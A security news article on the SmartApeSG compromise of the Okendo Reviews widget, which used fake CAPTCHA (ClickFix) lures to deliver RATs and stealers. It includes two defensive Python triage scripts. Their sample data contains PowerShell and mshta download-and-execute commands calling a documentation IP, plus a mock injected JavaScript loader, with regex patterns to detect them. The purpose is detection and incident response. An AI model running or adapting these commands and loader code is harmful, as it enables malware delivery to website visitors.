SmartApeSG Campaign Compromises Okendo Reviews Widget in Widespread Supply Chain Attack
Threat actors injected malicious JavaScript into the Okendo Reviews widget, a platform used by over 18,000 e-commerce sites, to deliver remote access trojans and info-stealers via fake CAPTCHA prompts.

A supply chain attack against the Okendo Reviews widget has exposed thousands of e-commerce websites and their visitors to malware, according to a report from Zscaler ThreatLabz. The SmartApeSG threat actor, also known as ZPHP or HANEYMANEY, injected obfuscated JavaScript into the legitimate widget script. Because the widget is embedded on homepages, product pages, and review forms across more than 18,000 brands, the malicious code had a broad and silent reach without requiring individual site breaches.
Zscaler ThreatLabz first detected the malicious activity on May 14, 2026, when its platform recorded a surge in traffic linked to SmartApeSG. The injected JavaScript acted as a staged loader, passing through several checks before fetching additional payloads. One of the key features was a User-Agent filter that restricted the attack to desktop browsers, since the later stages depended on the victim interacting with Windows. The script also wrote a marker to localStorage so that the lure was shown only once per browser profile, which limits repeat exposure and makes the behaviour harder to reproduce during analysis.
The malicious code employed an XOR-based decoding routine to reconstruct a hidden URL, from which it loaded a second-stage script. Victims who passed all filters were presented with a fake CAPTCHA or verification screen, a technique known as ClickFix. The prompt instructed users to open the Windows Run dialog (Win+R) and paste a command that the page's script had silently placed on their clipboard. That command then downloaded a PowerShell script or an HTML Application (HTA) file, which installed a remote access tool or information stealer.
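The Run-dialog step described above leaves a forensic trace: Windows records whatever was typed into Win+R under the RunMRU registry key, so a responder can triage hosts that visited affected stores by scanning those entries for loader-like commands. The script below is an added example written for this article, not code from Zscaler, Okendo, or the campaign; the registry values it parses are a constructed sample, and the regex indicators are the author's assumptions about what a ClickFix command tends to contain rather than indicators taken from the report.

```python
"""Triage of Windows Run-dialog history for ClickFix-style commands.

Added example (not Zscaler's or Okendo's code). ClickFix lures make the
victim paste a clipboard command into Win+R; Windows stores what was typed
there under HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU.
This script takes an exported copy of those values (constructed sample
below) and scores each entry for loader-like traits. The regexes and
sample entries are assumptions for illustration, not campaign indicators.
"""
import re

# Constructed sample of RunMRU values (value name -> data). Real entries
# end with a literal "\1" and the "MRUList" value orders them, most recent first.
SAMPLE_RUNMRU = {
    "a": "notepad\\1",
    "b": "powershell -w hidden -nop -c \"iex (iwr http://203.0.113.10/a.ps1 -UseBasicParsing)\"\\1",
    "c": "mshta http://203.0.113.10/verify.hta\\1",
    "d": "calc\\1",
    "MRUList": "cbda",
}

# Traits that, in combination, characterise a download-and-execute one-liner.
INDICATORS = [
    (r"\bmshta\b", "mshta launches an HTA"),
    (r"\bpowershell(\.exe)?\b|\bpwsh\b", "PowerShell invocation"),
    (r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile\b|-e(nc|ncodedcommand)?\b", "hidden/encoded flags"),
    (r"\biex\b|invoke-expression|invoke-webrequest|\biwr\b|\bcurl\b|\bbitsadmin\b", "download-and-execute"),
    (r"https?://", "remote URL"),
]


def score_command(cmd):
    """Return (score, reasons): how many indicator families the command hits."""
    reasons = [why for pat, why in INDICATORS if re.search(pat, cmd, re.IGNORECASE)]
    return len(reasons), reasons


def triage_runmru(values):
    """Walk RunMRU entries in MRUList order and score each one.

    Returns a list of dicts {name, command, score, reasons}; entries not
    referenced by MRUList are appended at the end in name order.
    """
    order = values.get("MRUList", "")
    names = [n for n in order if n in values]
    names += [n for n in sorted(values) if n not in order and n != "MRUList"]
    results = []
    for n in names:
        cmd = values[n]
        if cmd.endswith("\\1"):  # strip the trailing "\1" Explorer appends
            cmd = cmd[:-2]
        score, reasons = score_command(cmd)
        results.append({"name": n, "command": cmd, "score": score, "reasons": reasons})
    return results


def suspicious(values, threshold=2):
    """Entries hitting at least `threshold` indicator families, most recent first."""
    return [r for r in triage_runmru(values) if r["score"] >= threshold]


if __name__ == "__main__":
    for r in suspicious(SAMPLE_RUNMRU):
        print(f"[{r['score']}] {r['name']}: {r['command']}  <- {', '.join(r['reasons'])}")
```

On a live host the same values can be exported with `reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU runmru.reg` and fed to `triage_runmru` after parsing; a single hit such as a plain `mshta` entry is worth a look, while a hidden-window PowerShell download cradle should be treated as a probable compromise.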
The final payloads included NetSupport RAT, Remcos RAT, StealC, and Sectop RAT. These tools give attackers full remote control over an infected computer or allow them to steal passwords and financial credentials. The campaign demonstrates how threat actors can leverage trusted third-party integrations to distribute malware at scale without compromising each target site individually.
Zscaler ThreatLabz observed the compromised widget on websites ranging from mid-sized online stores to major retail brands. Traffic estimates for affected sites ranged from about 150,000 to several million monthly visitors. One impacted U.S. retail brand alone draws approximately 7 million visitors per month. On May 14, Zscaler's platform recorded nearly 15,000 blocks tied to SmartApeSG in a single day.
Okendo confirmed it was aware of the issue and restored the widget script to a clean state after Zscaler reported the incident. However, the window during which the malicious script was live may have exposed a significant number of visitors. The attack highlights the risk posed by third-party scripts on high-traffic e-commerce sites and the importance of monitoring supply chain integrations.
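Subresource Integrity cannot pin a vendor widget that the vendor legitimately updates, so the practical control for the monitoring the article calls for is to re-fetch the script on a schedule, compare it with a vetted baseline hash, and, when it changes, scan the new body for the loader traits described earlier (User-Agent gating, a localStorage run-once marker, an XOR decode loop, a clipboard write, and Run-dialog lure text). The script below is an added example written for this article, not Okendo's widget or Zscaler's detection logic; both script bodies are constructed stand-ins, and the trait patterns are the author's assumptions about how such a loader is typically written.

```python
"""Change detection plus heuristic triage for a third-party widget script.

Added example (not Okendo's or Zscaler's code). The two script bodies are
constructed stand-ins for a clean widget and a tampered copy; the regexes
below are assumed, general loader traits rather than campaign indicators.
"""
import hashlib
import re

# Constructed stand-in for a benign reviews widget.
BASELINE_WIDGET = """
(function(){var w=document.createElement('div');w.id='reviews-widget';
document.body.appendChild(w);fetch('/api/reviews').then(r=>r.json());})();
"""

# Constructed tampered copy: the same widget with a gated loader appended.
TAMPERED_WIDGET = BASELINE_WIDGET + """
(function(){if(/Mobile|Android|iPhone/.test(navigator.userAgent))return;
if(localStorage.getItem('_seen'))return;localStorage.setItem('_seen','1');
var k=7,e=[111,115,115,119],u='';for(var i=0;i<e.length;i++){u+=String.fromCharCode(e[i]^k);}
var s=document.createElement('script');s.src=u;document.head.appendChild(s);
navigator.clipboard.writeText('cmd');document.body.innerHTML+='Press Win+R, paste, then Enter';})();
"""

# Assumed loader traits; each is a regex over the script body.
LOADER_TRAITS = {
    "ua_gating": r"navigator\.userAgent",
    "run_once_marker": r"localStorage\.(getItem|setItem)",
    "xor_decode_loop": r"fromCharCode\([^)]*\^",
    "clipboard_write": r"clipboard\.writeText|execCommand\(\s*['\"]copy",
    "run_dialog_lure": r"Win(dows)?\s*\+\s*R|\bRun\b.*\bpaste\b",
    "dynamic_script_load": r"createElement\(\s*['\"]script['\"]",
}


def sha256_hex(text):
    """Content hash used as the stored baseline for the vendor script."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def scan_traits(script):
    """Names of loader traits present in the script, sorted for stable output."""
    flags = re.IGNORECASE | re.DOTALL
    return sorted(name for name, pat in LOADER_TRAITS.items() if re.search(pat, script, flags))


def appended_suffix(baseline, current):
    """If the change is a pure append (the common injection shape), return the
    appended part; otherwise None so the caller diffs the whole body."""
    return current[len(baseline):] if current.startswith(baseline) else None


def check_widget(current, baseline_hash, baseline_text=None, min_traits=2):
    """Compare the fetched script with the baseline and classify the result.

    verdict: "unchanged", "changed" (hash differs, few traits), or
    "suspicious" (hash differs and at least min_traits loader traits found).
    """
    h = sha256_hex(current)
    changed = h != baseline_hash
    traits = scan_traits(current)
    if not changed:
        verdict = "unchanged"
    elif len(traits) >= min_traits:
        verdict = "suspicious"
    else:
        verdict = "changed"
    suffix = appended_suffix(baseline_text, current) if baseline_text is not None else None
    return {"sha256": h, "changed": changed, "traits": traits,
            "verdict": verdict, "appended": suffix}


if __name__ == "__main__":
    base = sha256_hex(BASELINE_WIDGET)
    for label, body in (("baseline", BASELINE_WIDGET), ("tampered", TAMPERED_WIDGET)):
        r = check_widget(body, base, BASELINE_WIDGET)
        print(label, r["verdict"], r["traits"])
```

In production the baseline hash lives in the monitoring job's state store and `current` comes from fetching the widget URL the storefront actually embeds, from the same network position as a visitor, since the loader gated on User-Agent and a mobile or headless fetch may see a clean copy. A "changed" verdict with no traits is normal vendor churn to be re-vetted; "suspicious" should page someone and the appended fragment goes straight to the analyst.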